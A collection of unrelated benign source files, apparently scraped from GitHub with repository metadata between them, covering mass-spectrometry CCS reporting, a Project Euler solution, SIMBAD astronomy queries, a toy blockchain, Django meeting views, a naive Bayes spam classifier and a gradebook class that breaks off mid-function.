'{0:.3f}ppm, z_score={1:.2f}'.format(ccs.mass_ppm_error[i], ccs.intensity_z[i]),
color='k', fontsize=10)
# axis.scatter(pv[i], ccs.arrival_time[i], s=np.log(ccs.intensity_org[i]), c=color)
axis.scatter(pv[i], ccs.arrival_time[i], s=1000*ccs.intensity[i], c=color, alpha=0.8)
axis.text(min(pv)-2*(p_vmax - p_vmin)/7, min(ccs.arrival_time)-0.8*min(dt_diff),
'CCS:{0:.4f}(r2:{1:.5f})'.format(prop['ccs'], prop['r2']),
color='r', fontsize=10)
axis.plot(p_v, 1000 * (prop['intercept'] + prop['slope']*p_v), 'r', label='fitted line')
axis.set_title(title)
axis.set_xlim(left=p_vmin-pv_width*0.5, right=p_vmax+pv_width)
axis.set_xlabel('Pressure/Voltages (Torr/V)')
axis.set_ylabel('Arrival time (ms)')
def plot_intensity_distribution(features, adducts_mass, ax, ppm=50):
if features.shape[0] > 0:
ddata = np.log(features.intensity_org)
g = sns.kdeplot(ddata, shade=True, color="b", ax=ax)
ax.axvline(np.log(np.median(features.intensity_org)), linestyle=':')
ax.axvline(np.log(10*np.median(features.intensity_org)), linestyle=':')
ax.axvline(np.log(np.mean(features.intensity_org)+2*np.std(features.intensity_org)), linestyle='-.')
for adduct in adducts_mass:
sel = features[is_in_tolerance(features.mz, adducts_mass[adduct][0], ppm)]
if sel.shape[0] > 0:
ax.scatter(np.log(sel['intensity_org']), np.zeros(sel.shape[0]), c=get_adducts_colors(adduct))
ax.set_xlabel('log(Intensity)')
ax.set_ylabel('Density')
ax.set_xlim([np.min(ddata), np.max(ddata)])
def report(FLAGS, ccs_table, target_list):
if ccs_table.shape[0] == 0:
print("Unfortunately, we couldn't find any good CCS values.")
return
def get_stats_adduct(group):
return {'ccs_avg_adduct': group.mean(), 'ccs_rsd_adduct': 100*group.std()/group.mean(), 'ccs_count_adduct': group.count()}
def get_stats_file(group):
return {'ccs_count_file': group.count()}
ccs_avg = ccs_table.groupby(['Compound_id', 'adduct'])['ccs'].apply(get_stats_adduct).unstack()
ccs_table = pd.merge(ccs_table, ccs_avg.reset_index(), on=['Compound_id','adduct'], how='left')
ccs_count_file = ccs_table.groupby(['Compound_id', 'adduct', 'replicate'])['ccs'].apply(get_stats_file).unstack()
ccs_table = pd.merge(ccs_table, ccs_count_file.reset_index(), on=['Compound_id', 'adduct','replicate'], how='left')
print(ccs_table.head())
# save to a csv file after reordering the columns
cols = list(ccs_table.columns)
if 'ccs_avg_adduct' in cols:
cols.pop(cols.index('ccs_avg_adduct'))
else:
ccs_table['ccs_avg_adduct'] = np.nan
if 'ccs_rsd_adduct' in cols:
cols.pop(cols.index('ccs_rsd_adduct'))
else:
ccs_table['ccs_rsd_adduct'] = np.nan
cols.pop(cols.index('Compound_id'))
cols.pop(cols.index('Ionization'))
cols.pop(cols.index('adduct'))
cols.pop(cols.index('ccs'))
cols.pop(cols.index('adduct_mz'))
cols.pop(cols.index('name'))
newcols = ['Compound_id','name','Ionization','adduct','adduct_mz','ccs_avg_adduct','ccs_rsd_adduct','ccs']+cols
df = ccs_table[newcols]
# df = ccs_table
df.to_csv(FLAGS.output_dir+'/'+FLAGS.output, sep='\t')
def multi(FLAGS, config_params):
if FLAGS.ppm: config_params['mz_tolerance'] = FLAGS.ppm
os.makedirs(FLAGS.output_dir, exist_ok=True)
# read a list of targets
if FLAGS.target_list_file.endswith('.csv'):
target_list = pd.read_csv(FLAGS.target_list_file)
else: target_list = pd.read_csv(FLAGS.target_list_file, sep='\t')
num_targets = target_list.shape[0]
if "Ionization" not in target_list.columns:
target_list = pd.concat([target_list]*2, ignore_index=True)
target_list['Ionization'] = ['pos']*num_targets+['neg']*num_targets
target_list['ID']= target_list.CompoundID.str.cat("_"+target_list.Ionization)
target_list = target_list.fillna(method='ffill')
# find RawFileName
import re
suffix_header = config_params['suffix_raw'].split('{',1)[0]
print(suffix_header)
uniqueIDs = set(target_list.UniqueID4DfileNames.drop_duplicates().tolist())
print(uniqueIDs)
if ("RawFileName" not in target_list.columns) or ("FrameMetaName" not in target_list.columns):
feature_files = set(glob.glob(FLAGS.feature_files))
framemeta_files = set(glob.glob(FLAGS.framemeta_files))
uniqueIDs_list = []
for _f in feature_files:
for uid in uniqueIDs:
if bool(re.search('[-_]?{}[-_]'.format(uid), _f)):
if bool(re.search('[-_]?pos[-_]', _f.lower())):
_ion = 'pos'
else:
_ion = 'neg'
print(_f, uid, _ion)
# prefix of file names
filename = os.path.basename(_f).split(suffix_header)[0]
framemeta_name = ""
for framemeta in framemeta_files:
if filename in framemeta:
framemeta_name = framemeta
prefix = _f.split(suffix_header)[0]
uniqueIDs_list.append({'RawFileName':prefix, 'FrameMetaName':framemeta_name, 'uid':uid, 'ionizations':_ion})
# break
print(uniqueIDs_list)
tdf = pd.DataFrame(uniqueIDs_list).drop_duplicates()
target_list = target_list.merge(tdf, left_on=['Ionization','UniqueID4DfileNames'], right_on=['ionizations','uid'])
del target_list['ionizations']
del target_list['uid']
# target_list.to_csv('temp.csv')
## e.g., S00001.b if you have the same compound id but different versions.
# num_comp = list(pd.DataFrame(target_list.CompoundID.str.split('\.').tolist(), columns = ['CompoundID','ver']).CompoundID.drop_duplicates())
compound_ids = target_list.ID.drop_duplicates().tolist()
num_pos = (target_list.drop_duplicates(subset='ID').Ionization=='pos').sum()
num_neg = (target_list.drop_duplicates(subset='ID').Ionization=='neg').sum()
# compounds
assert len(compound_ids) == num_pos+num_neg,\
"Please check if there are duplicates in CompoundID and its Ionization"
print('Number of compounds: {0} (pos:{1}, neg:{2})'.format(len(compound_ids), num_pos, num_neg))
print(compound_ids)
ccs_results = []
start_time = time.time()
for cid in compound_ids:
# compute ccs for this compound
ccs_results += get_ccs(FLAGS, cid, target_list, config_params)
print('[{0}] {1:.2f} sec'.format(cid, (time.time()-start_time)))
print('Total time: {0:.2f} sec/compound(e.g., 3 reps)'.format((time.time()-start_time)/len(compound_ids)))
ccs_table = pd.DataFrame(ccs_results)
report(FLAGS, ccs_table, target_list)
if __name__ == '__main__':
FLAGS = parser.parse_args()
print("options:", FLAGS)
# read a set of configuration parameters
config_params = get_config(FLAGS.config_file)
print(config_params)
multi(FLAGS, config_params)
|
PNNL-Comp-Mass-Spec/AutoCCS
|
multiCCS.py
|
multiCCS.py
|
py
| 29,722 |
python
|
en
|
code
| 7 |
github-code
|
6
|
34131786759
|
import time
import numpy as np
def isleapyear(year):
    if year % 4 == 0:
        if year % 100 == 0:
            return year % 400 == 0
        return True
    return False
if __name__ == '__main__':
num_sunday = 0
year = 1900
monthsdsnonleap = {'January':31,'February':28,'March':31,
'April':30,'May':31,'June':30,
'July':31,'August':31,'September':30,
'October':31,'November':30,'December':31}
monthsdsleap = {'January':31,'February':29,'March':31,
'April':30,'May':31,'June':30,
'July':31,'August':31,'September':30,
'October':31,'November':30,'December':31}
stime = time.time()
numdays = 365
firstofeachmonth = [1]
monthsds = monthsdsnonleap
months = list(monthsds.keys())
for m in months[:-1]:
firstofeachmonth.append((firstofeachmonth[-1]+monthsds[m]%7)%7)
firstofeachmonth = dict(zip(months,firstofeachmonth))
#print(firstofeachmonth)
firstofeachmonth = [(firstofeachmonth['December']+monthsds['December']%7)%7]
#print(firstofeachmonth)
year = 1901
while year<=2000:
#print(isleapyear(year),year)
if isleapyear(year):
monthsds = monthsdsleap
else:
monthsds = monthsdsnonleap
for m in months[:-1]:
firstofeachmonth.append((firstofeachmonth[-1]+monthsds[m]%7)%7)
#print(monthsds[m],firstofeachmonth)
firstofeachmonth = dict(zip(months,firstofeachmonth))
#print(np.count_nonzero(np.array(list(firstofeachmonth.values()))==0))
num_sunday += np.count_nonzero(np.array(list(firstofeachmonth.values()))==0)
year +=1
firstofeachmonth = [(firstofeachmonth['December']+monthsds['December']%7)%7]
print(num_sunday)
print("Time taken :: %.3f seconds"%(time.time()-stime))
|
sadimanna/project_euler
|
p19.py
|
p19.py
|
py
| 1,760 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71791936828
|
from unittest import result
import pyvo as vo
import numpy as np
import pandas as pd
import re
from typing import Optional, Tuple
import requests                  # used by title_and_authors below
from bs4 import BeautifulSoup    # used by title_and_authors below
def simbad_tap():
return vo.dal.TAPService("http://simbad.u-strasbg.fr/simbad/sim-tap")
def clean_str(obj_id: str) -> str:
return ' '.join(obj_id.split())
def fetch_catalog_id(ids: str, catalog_identifier: str, verbose: bool = False):
try:
return re.findall(f'(?<={catalog_identifier} )\d+', ids)[0]
except IndexError:
if verbose:
print(f'No {catalog_identifier} id for ids={ids}...')
return np.nan
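# Hedged usage sketch (the identifier string below is made up, not real SIMBAD output): the
# lookbehind regex above extracts the digits that follow a catalogue tag inside the
# pipe-separated "ids" field returned by SIMBAD.
def _example_fetch_catalog_id():
    ids = 'HD 12345|Gaia DR2 111222333|Gaia EDR3 444555666|TIC 778899'
    assert fetch_catalog_id(ids, 'EDR3') == '444555666'
    assert fetch_catalog_id(ids, 'DR2') == '111222333'
    assert np.isnan(fetch_catalog_id(ids, 'TYC'))   # missing catalogue -> np.nan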
def resolve_name(obj_identifier: str) -> Tuple[Optional[float], Optional[float], Optional[float], Optional[float], Optional[float], Optional[float]]:
service = simbad_tap()
try:
resultset = service.search(f'''select ra, dec, plx_value, pmra, pmdec, rvz_radvel
from basic where main_id='{obj_identifier}'
''').to_table().to_pandas().values
if len(resultset) == 1:
return tuple(resultset[0, :])
else:
return None, None, None, None, None, None
except Exception as e:
print(f'Exception while querying: {e}')
return None, None, None, None, None, None
def fetch_object_children(obj_identifier: str) -> pd.DataFrame:
service = simbad_tap()
resultset = service.search(f'''
SELECT main_id as child, oid, link_bibcode, membership,
ra, dec, coo_bibcode,
plx_value, plx_err, plx_bibcode,
pmra, pmdec, pm_err_maj_prec, pm_bibcode,
rvz_radvel, rvz_err, rvz_bibcode, ids.ids
from h_link JOIN ident as p on p.oidref=parent JOIN basic on oid=child JOIN ids on ids.oidref=child
WHERE p.id = '{obj_identifier}' and (membership >=95 or membership is null);''')
obj_ids = resultset['child'].data
oids = resultset['oid'].data
bibcodes = resultset['link_bibcode'].data
ras = resultset['ra'].data
decs = resultset['dec'].data
coo_bibcodes = resultset['coo_bibcode'].data
plx_values = resultset['plx_value'].data
plx_errs = resultset['plx_err'].data
plx_bibcodes = resultset['plx_bibcode'].data
pmras = resultset['pmra'].data
pmdecs = resultset['pmdec'].data
pm_errs = resultset['pm_err_maj_prec'].data
pm_bibcodes = resultset['pm_bibcode'].data
radvels = resultset['rvz_radvel'].data
rvz_errs = resultset['rvz_err'].data
rvz_bibcodes = resultset['rvz_bibcode'].data
ids = resultset['ids'].data
data = np.array([
np.array(list(map(clean_str, obj_ids))),
oids.astype(int),
bibcodes,
ras.astype(float),
decs.astype(float),
coo_bibcodes,
plx_values.astype(float),
plx_errs.astype(float),
plx_bibcodes,
pmras.astype(float),
pmdecs.astype(float),
pm_errs.astype(float),
pm_bibcodes,
radvels.astype(float),
rvz_errs.astype(float),
rvz_bibcodes,
ids
])
cluster_children: pd.DataFrame = pd.DataFrame(
columns=['obj_id', 'oid', 'link_bibcode', 'ra', 'dec', 'coo_bibcode',
'parallax', 'parallax_err', 'parallax_bibcode',
'pmra', 'pmdec', 'pm_err', 'pm_bibcode',
'radvel', 'radvel_err', 'rvz_bibcode', 'ids'],
data=data.T)
cluster_children = cluster_children.dropna(subset=['ra', 'dec', 'link_bibcode'])
cluster_children['EDR3 id'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'EDR3')
cluster_children['DR2 id'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'DR2')
cluster_children['TIC'] = np.vectorize(fetch_catalog_id)(cluster_children.ids, 'TIC')
cluster_children['EDR3 id'] = pd.to_numeric(cluster_children['EDR3 id'], errors='coerce')
cluster_children['DR2 id'] = pd.to_numeric(cluster_children['DR2 id'], errors='coerce')
cluster_children['TIC'] = pd.to_numeric(cluster_children['TIC'], errors='coerce')
cluster_children = cluster_children.dropna(subset=['EDR3 id'])
edr_unique = np.unique(cluster_children['EDR3 id'].values)
reported_counts = {x: len(np.nonzero(cluster_children['EDR3 id'].values==x)[0]) for x in edr_unique}
cluster_children['reported'] = cluster_children['EDR3 id'].apply(lambda x: reported_counts[x])
cluster_children['parallax_year'] = cluster_children['parallax_bibcode'].apply(lambda x: x[:4])
cluster_children['pm_year'] = cluster_children['pm_bibcode'].apply(lambda x: x[:4])
cluster_children['rvz_year'] = cluster_children['rvz_bibcode'].apply(lambda x: x[:4])
cluster_children = cluster_children.sort_values(by=['EDR3 id', 'parallax_year', 'pm_year', 'rvz_year'])
cluster_children = cluster_children.drop_duplicates(subset=['EDR3 id'])
return cluster_children
def title_and_authors(bibcode: str) -> str:
URL = f'https://ui.adsabs.harvard.edu/abs/{bibcode}/abstract'
website = requests.get(URL)
results = BeautifulSoup(website.content, 'html.parser')
title = ' '.join(results.find('h2', class_='s-abstract-title').text.split())
authors = [author.text.strip() for author in results.find_all('li', class_='author')]
return f'{",".join(authors)}:\n {title}'
def count_reportings(children, edr3_id):
return len(children[children['EDR3 id'].astype(int)==edr3_id])
|
maja-jablonska/blue-stragglers-with-gaia
|
simbad_download.py
|
simbad_download.py
|
py
| 5,295 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42360515633
|
## Using python3
## https://open.kattis.com/problems/apaxiaaans
name = input()
last = ''
c = ''
for i in range(len(name)):
c = name[i]
if (c != last):
print(c, end = '')
last = c
print()
|
Resethel/Kattis
|
Problems/apaxiaaans/Python3/apaxiaaans.py
|
apaxiaaans.py
|
py
| 214 |
python
|
en
|
code
| 1 |
github-code
|
6
|
33276100451
|
# coding: utf-8
# In[2]:
import hashlib
import json
from datetime import datetime
class Block:
def calculateHash(self):
return hashlib.sha256((self.timestamp+str(self.transaction)+self.previoushash+str(self.nonce))
.encode('utf-8')).hexdigest()
# return hashlib.sha256(("abc").encode('utf-8')).hexdigest()
def __init__(self, timestamp, transaction, previoushash=''):
print("Constructing a new block")
self.timestamp = timestamp
self.transaction = transaction
self.previoushash = previoushash
self.nonce = 0
self.hash = self.calculateHash()
#Proof of Work logic
def mineBlock(self, newBlock, difficulty):
#print(f"SubString {newBlock.hash[0:difficulty]}")
while(str(newBlock.hash)[0:difficulty] != "0"*difficulty):
newBlock.nonce += 1
#print(f"New Hash {newBlock.calculateHash()}")
newBlock.hash = newBlock.calculateHash()
return newBlock
def __str__(self):
return "Timestamp: "+self.timestamp+" transaction: "+self.transaction+" Hash: "+self.hash
class BlockChain:
def createGenesisBlock(self):
initialTransactions=[Transaction("demo","XYZ", 0)]
return Block("09-08-2018", initialTransactions)
def __init__(self):
self.chain = [self.createGenesisBlock()]
self.difficulty = 2
self.pendingTransaction=[]
self.reward=100
def minePendingTransactions(self,miningRewardAddress):
newBlock=Block(str(datetime.now()),self.pendingTransaction)
newBlock=newBlock.mineBlock(newBlock,self.difficulty)
newBlock.previoushash=self.getLatestBlock().hash
print("Block successfully mined!!")
self.chain.append(newBlock)
self.pendingTransaction=[
Transaction("System",miningRewardAddress,self.reward)
]
def getLatestBlock(self):
return self.chain[len(self.chain)-1]
def createTransaction(self,transaction):
self.pendingTransaction.append(transaction)
def checkBalanceOfAddress(self,address):
balance=0
for block in self.chain:
for tran in block.transaction:
if(tran.fromAddress==address):
balance-=tran.amount
elif(tran.toAddress==address):
balance+=tran.amount
return balance
def validateBlockChain(self):
i = 1
while(i < len(self.chain)):
currblock = self.chain[i]
prevBlock = self.chain[i-1]
if(not currblock.hash == currblock.calculateHash()):
return False
if(not currblock.previoushash == prevBlock.hash):
return False
i += 1
return True
class Transaction:
def __init__(self,fromAddress,toAddress,amount):
self.fromAddress=fromAddress
self.toAddress=toAddress
self.amount=amount
def __str__(self):
#return "From: "+self.fromAddress+" To: "+self.toAddress+" Amount: "+self.amount
return str(self.__dict__)
def obj_to_dict(obj):
return obj.__dict__
blockChain = BlockChain()
blockChain.createTransaction(Transaction("ckp","abc",10))
blockChain.createTransaction(Transaction("abc","ckp",100))
print(json.dumps(blockChain.chain, default=obj_to_dict))
print("Starting miner!!")
blockChain.minePendingTransactions("ThePrime")
print(json.dumps(blockChain.chain, default=obj_to_dict))
print(f"Balance of abc {blockChain.checkBalanceOfAddress('abc')}")
print(f"Balance of ckp {blockChain.checkBalanceOfAddress('ckp')}")
print(f"Balance of ThePrime {blockChain.checkBalanceOfAddress('ThePrime')}")
print("Starting miner!!")
blockChain.minePendingTransactions("ThePrime")
print(f"Balance of ThePrime {blockChain.checkBalanceOfAddress('ThePrime')}")
|
cpandya231/Blockchain_Poc
|
Blockchain_poc_with miner and transactions.py
|
Blockchain_poc_with miner and transactions.py
|
py
| 3,935 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37233125461
|
from naive_bayes import naive_bayes_run
from naive_bayes import calc_prob
from create_voc_functions import create_vocabulary
from vector_functions import create_vectors
from results import plot_results
import pickle
#for train
path1 = pickle.load( open( "examples_edit\\training_path.p", "rb" ) )
typ1 = pickle.load( open( "examples_edit\\training_types.p", "rb" ) )
#for dev
path2 = pickle.load( open( "examples_edit\\dev_path.p", "rb" ) )
typ2 = pickle.load( open( "examples_edit\\dev_types.p", "rb" ) )
#for test
path3 = pickle.load( open( "examples_edit\\test_path.p", "rb" ) )
typ3 = pickle.load( open( "examples_edit\\test_types.p", "rb" ) )
max_acc = 0
max_m = 0
ms = [500,1000,1500]
# search for the best hyperparameter combination
for m in ms:
Xs,voc_index,sum_mes,sum_ham_mes = create_vocabulary(m,True,10)
path_train, vec_emails_train, typ_train = create_vectors(path1,typ1,voc_index)
path_dev, vec_emails_dev, typ_dev = create_vectors(path2,typ2,voc_index)
probs = calc_prob(Xs,sum_mes,sum_ham_mes) # compute the per-class word probabilities
prob_ham = sum_ham_mes/sum_mes
res1 = naive_bayes_run(vec_emails_dev,typ_dev,probs,prob_ham,voc_index)
acc = (res1[0][0]+res1[1][1])/(res1[0][0]+res1[0][1]+res1[1][0]+res1[1][1])
if acc>max_acc:
max_acc = acc
max_m = m
print("Max uperparametros m: ",max_m)
# results on the test data
x=[]
resTests = []
resTrains = []
print("Predict...")
for i in range(10):
Xs, voc_index,sum_mes,sum_ham_mes = create_vocabulary(max_m,True,i+1) # build the vocabulary using the best m
#create vectors
path_train, vec_emails_train, typ_train = create_vectors(path1,typ1,voc_index)
path_testm, vec_emails_test, typ_test = create_vectors(path3,typ3,voc_index)
x.append(sum_mes)
probs = calc_prob(Xs,sum_mes,sum_ham_mes) # compute the per-class word probabilities
prob_ham = sum_ham_mes/sum_mes
resTest = naive_bayes_run(vec_emails_test,typ_test,probs,prob_ham,voc_index)
resTrain = naive_bayes_run(vec_emails_train[0:sum_mes],typ_train[0:sum_mes],probs,prob_ham,voc_index)
resTests.append(resTest)
resTrains.append(resTrain)
plot_results("test","naive",x,resTests,resTrains)
|
ntinouldinho/Artificial-Intelligence-SpamHam-Classifier
|
naive_bayes_main.py
|
naive_bayes_main.py
|
py
| 2,271 |
python
|
en
|
code
| 1 |
github-code
|
6
|
35227184392
|
import glob
import os
import shutil
from tqdm import tqdm
from sklearn.model_selection import train_test_split
import multiprocessing as mp
from functools import partial
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i : i + n]
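# Hedged usage note (added for clarity): the final chunk may be shorter when len(lst) is not a
# multiple of n.
def _example_chunks():
    assert list(chunks([1, 2, 3, 4, 5], 2)) == [[1, 2], [3, 4], [5]]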
def loop(images, source_dir, target_dir):
for image in tqdm(images):
#source = f"{source_dir}{image}"
#target = f"{target_dir}{image}"
shutil.copy(os.path.join(source_dir, "input", image), os.path.join(target_dir, "lr", image))
shutil.copy(os.path.join(source_dir, "target", image), os.path.join(target_dir, "hr", image))
if __name__ == "__main__":
train_names = glob.glob("train_data/input/*.png")
train_names = [f.replace("train_data/input/", "") for f in train_names]
tr, val = train_test_split(train_names, test_size=0.1, random_state=42)
print(train_names)
assert len(tr) + len(val) == len(train_names)
assert all([text not in tr for text in val])
#os.makedirs("val_data_srgan", exist_ok=True)
#os.makedirs("val_data_srgan/lr", exist_ok=True)
#os.makedirs("val_data_srgan/hr", exist_ok=True)
os.makedirs("dataset_srgan3", exist_ok=True)
os.makedirs("dataset_srgan3/train", exist_ok=True)
os.makedirs("dataset_srgan3/train/lr", exist_ok=True)
os.makedirs("dataset_srgan3/train/hr", exist_ok=True)
os.makedirs("dataset_srgan3/test", exist_ok=True)
os.makedirs("dataset_srgan3/test/lr", exist_ok=True)
os.makedirs("dataset_srgan3/test/hr", exist_ok=True)
cpus = mp.cpu_count()
val_chunks = list(chunks(val, len(val) // cpus))
train_chunks = list(chunks(tr, len(tr) // cpus))
pool = mp.Pool(cpus)
pool.map(partial(loop, source_dir="train_data", target_dir="dataset_srgan3/train"), train_chunks)
pool.map(partial(loop, source_dir="train_data", target_dir="dataset_srgan3/test"), val_chunks)
#for name in tqdm(val, desc="Saving val data..."):
# shutil.move(, f"val_data_srgan/lr/{name}")
# shutil.move(f"dataset_srgan/hr/{name}", f"val_data_srgan/hr/{name}")
|
avacaondata/SpainAI_Hackaton_ComputerVision
|
split_data_multiprocessing.py
|
split_data_multiprocessing.py
|
py
| 2,114 |
python
|
en
|
code
| 1 |
github-code
|
6
|
41460148421
|
#Python script to retrieve Top 10 performing Cryptocurrencies, ranked by Market capitalization
#Import relevant modules to query API
import requests, json
#Define variables used to query API
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'
headers = {
'Accept': 'application/json',
'Accept-Encoding': 'deflate, gzip',
'X-CMC_PRO_API_KEY': '4831410c-b174-4908-819a-bb923176a2d7',
}
qs = {'start':'1','limit':'10','convert':'USD'}
#Define program variables
counter = 0
topNum = range(0,10)
table_title = " TOP 10 PERFORMING CRYPTOCURRENCIES -Ranked: Market capitalization-"
table_header = ['#', 'Name', 'Market Cap ($)', 'Price ($)', 'Volume-24h ($)', 'Change-24h (%)', 'Circulating Supply']
data_keys = ['cmc_rank', 'name', 'quote', 'circulating_supply']
quote_keys = ['market_cap', 'price', 'volume_24h','percent_change_24h']
#Request data from CoinMarketCap API using GET function
cmc_data = requests.get(url, headers=headers, params=qs)
if cmc_data.status_code == 200: #Check if status is ok
response = cmc_data.json() #use built-in json decoder to get json response content
data = response['data']
if all(k in data[0] for k in data_keys): #Check if all 2nd level keys exist
if all(k in data[0]['quote']['USD'] for k in quote_keys): #Check if all 3rd level keys exist
print('All requested keys exist\n\n')
print("{:^150}".format(table_title))
print('='*150)
for i in table_header:
print("{:<20s}".format(i),end='')
print('\n')
print('='*150)
#Print # cryptocurrencies defined in topNum
for x in topNum:
for y in data_keys:
if y == 'quote':
for z in quote_keys:
print("{:<20.2f}".format(data[x][y]['USD'][z]), end='')
elif y == 'circulating_supply':
symbol = data[x]['symbol']
print("{:>.2f}".format(data[x][y]), symbol, end='')
else:
print("{:<20}".format(data[x][y]), end='')
print('\n')
else:
print('ERROR - check "qoute" keys')
else:
print('ERROR - check "data" keys')
else :
print('ERROR: Check status code: ',cmc_data.status_code)
|
lilokotze/CMC_assignment
|
CMC_assignment.py
|
CMC_assignment.py
|
py
| 2,542 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27566260651
|
from django.shortcuts import render, HttpResponseRedirect
from .forms import MeetingCreateForm
from .models import Meeting
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from django.contrib import messages
from datetime import datetime, timezone as tz
from django.utils import timezone
def home(request):
form = MeetingCreateForm()
if request.method == 'POST':
form = MeetingCreateForm(request.POST)
if form.is_valid():
fm = form.save(commit=False)
# since in our form, we do not want to be selecting users,
# we have to set the creator as the current user.
fm.creator = request.user
fm.save()
return HttpResponseRedirect(reverse('meeting_list'))
return render(request, 'onlinemeet/home.html', {'form': form})
@login_required() # to ensure only logged in user can view this page.
def meeting_list(request):
"""We are going to filter the meeting, so only the registered user can view
the page, and then all meeting created by such individual will be displayed"""
user = request.user
# meeting_url = request.build_absolute_uri()
meetings = Meeting.objects.filter(creator=user)
return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
def meeting(request, unique_meeting_name):
message = None
meeting = Meeting.objects.get(unique_meeting_name=unique_meeting_name)
if not meeting.meeting_time:
"""
will check if it is not time for the meeting using the property we declared in the model.
"""
now = timezone.localtime()
t = abs(now - meeting.starting_date_time).total_seconds()
MinutesGet, SecondsGet = divmod(t, 60)
HoursGet, MinutesGet = divmod(MinutesGet, 60)
message = f"it is not the time for meeting {meeting.title_of_meeting}, Meeting starts in {HoursGet} Hours : {MinutesGet} Minutes : {'{:.2f}'.format(SecondsGet)} Seconds."
# return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
print(now, message)
messages.warning(request, message)
# return render(request, 'onlinemeet/meeting_list.html', {'meetings': meetings})
return HttpResponseRedirect(reverse('home'))
elif meeting.after_meeting:
""" will check if the meeting time has passed"""
now = timezone.localtime()
t = abs(meeting.ending_date_time - now).total_seconds()
MinutesGet, SecondsGet = divmod(t, 60)
HoursGet, MinutesGet = divmod(MinutesGet, 60)
message = f"The meeting {meeting.title_of_meeting}, ended {HoursGet} Hours : {MinutesGet} Minutes : {'{:.2f}'.format(SecondsGet)} Seconds."
print(now, message)
messages.warning(request, message)
return HttpResponseRedirect(reverse('home'))
if not request.user == meeting.creator:
"""check to know if the current user is the creator of the meeting
if True, then the person will be redirected to a page that has moderator privileges, else, redirect the guest to the guest page."""
return render(request, 'onlinemeet/guest.html', {'meeting': meeting,
"message": message})
return render(request, 'onlinemeet/meeting_page.html', {'meeting': meeting})
|
Afeez1131/Django-online-meeting
|
onlinemeet/views.py
|
views.py
|
py
| 3,327 |
python
|
en
|
code
| 2 |
github-code
|
6
|
30595009770
|
from random import randint
count = 1;
print('''Sou seu computador...
Acabei de pensar em um Nº entre 0 e 10.
Será que você consegue adivinhar qual foi?''')
n = randint(0, 10)
#print(n)
tenta = int(input('Qual o seu palpite? '))
while tenta != n:
count += 1
if tenta < n:
print('Mais... Tente mais uma vez.')
tenta = int(input('Qual é seu palpite? '))
elif tenta > n:
print('Menos... Tente mais uma vez.')
tenta = int(input('Qual é seu palpite? '))
print('Acertou com {} tentativas. Parabéns!'.format(count))
|
ErickFernan/Estudos-de-Pyhton
|
Estudo Python/Estruturas de Repetição/Estrutura repetição WHILE/ex058.py
|
ex058.py
|
py
| 559 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
42831472759
|
from django.urls import path
from . import views
urlpatterns = [
path('',views.home,name='home'),
path('<slug:c_slug>/',views.home,name='c_slug'),
path('search',views.search_box,name='search'),
path('<slug:c_slug>/<slug:p_slug>/',views.details,name='details')
]
|
muhammediyas786/Shopping-cart
|
ShopApp/urls.py
|
urls.py
|
py
| 279 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6542821272
|
from student import Student
from db import StudentRepository
import csv
class Gradebook:
def __init__(self) -> None:
self.__db = StudentRepository()
self.__students: list[Student] = self.__db.getStudents()
@property
def students(self) -> list[Student]:
return self.__students
def addStudent(self, studentID: int, firstName: str, lastName:str):
for student in self.__students:
if student.studentID == studentID:
raise KeyError("Duplicate Student ID")
policies = self.readPolicies()
numAssignments = policies[0] + policies[2] + policies[4]
student = Student(studentID, firstName, lastName, [0] * numAssignments)
print(student)
self.__students.append(student)
self.saveStudents()
def saveStudents(self):
self.__db.saveStudents(self.__students)
def recordScores(self, type: str):
policies = self.readPolicies()
def findStudent(assignmentNumber: int):
for student in self.__students:
print("Student ID: " + str(student.studentID) + ", Student Name: " + student.firstName + " " + student.lastName)
score = float(input("Input Score: "))
student.addscore(score, assignmentNumber)
self.saveStudents()
if type == 'P':
number = int(input("Assignment number:"))
if number > policies[0]:
raise ValueError("Invalid Assignment Number")
findStudent(number - 1)
elif type == 'T':
number = int(input("Test number: "))
if number > policies[2]:
raise ValueError("Invalid Test Number")
findStudent(number + policies[0] - 1)
elif type == 'F':
findStudent(policies[0] + policies[2] + policies[4] - 1)
def changeScores(self):
policies = self.readPolicies()
studentID = int(input("Student ID: "))
newScore = float(input("New Score: "))
type = input("Type of Scores (P/T/F): ")
for student in self.__students:
if student.studentID == studentID:
if type == 'P':
number = int(input("Assignment number to change: "))
student.addscore(newScore, number - 1)
elif type == 'T':
number = int(input("Test number to change: "))
student.addscore(newScore, policies[0] + number - 1)
elif type == 'F':
student.addscore(newScore, policies[0] + policies[2] + policies[4] - 1)
else:
raise ValueError("Invalid input.")
self.saveStudents()
return
raise KeyError("Student not found!")
def finalScores(self):
policies = self.readPolicies()
numOfAssignment = policies[0]
numOfTest = policies[2]
numOfExam = policies[4]
for student in self.__students:
assignmentScore = 0
testScore = 0
examScore = 0
for x in range(numOfAssignment):
assignmentScore = assignmentScore + float(student.scores[x])
assignmentScore = assignmentScore * (policies[1] / 100) / numOfAssignment
for x in range(numOfTest):
testScore += float(student.scores[x + numOfAssignment])
testScore = testScore * (policies[3] / 100) / numOfTest
for x in range(numOfExam):
examScore = float(student.scores[x + numOfAssignment + numOfTest]) * (policies[5] / 100)
finalScore = assignmentScore + testScore + examScore
student.finalScore = finalScore
self.saveStudents()
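# Worked example (illustrative numbers, added for clarity; not from any real gradebook):
# with policies [2, 40, 2, 40, 1, 20] (2 assignments worth 40%, 2 tests worth 40%, 1 final worth 20%)
# and scores [80, 90, 70, 80, 100], the final score computed above is
# (80 + 90) * 0.40 / 2 + (70 + 80) * 0.40 / 2 + 100 * 0.20 = 34 + 30 + 20 = 84.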
def readPolicies(self) -> list[int]:
policies = []
with open('policies.csv', 'r', newline = "") as file:
policiesInfo = file.readlines()[1]
policiesArray = policiesInfo.split(",")
for policy in policiesArray:
policies.append(int(policy))
return policies
def savePolicies(self, info: list[str]):
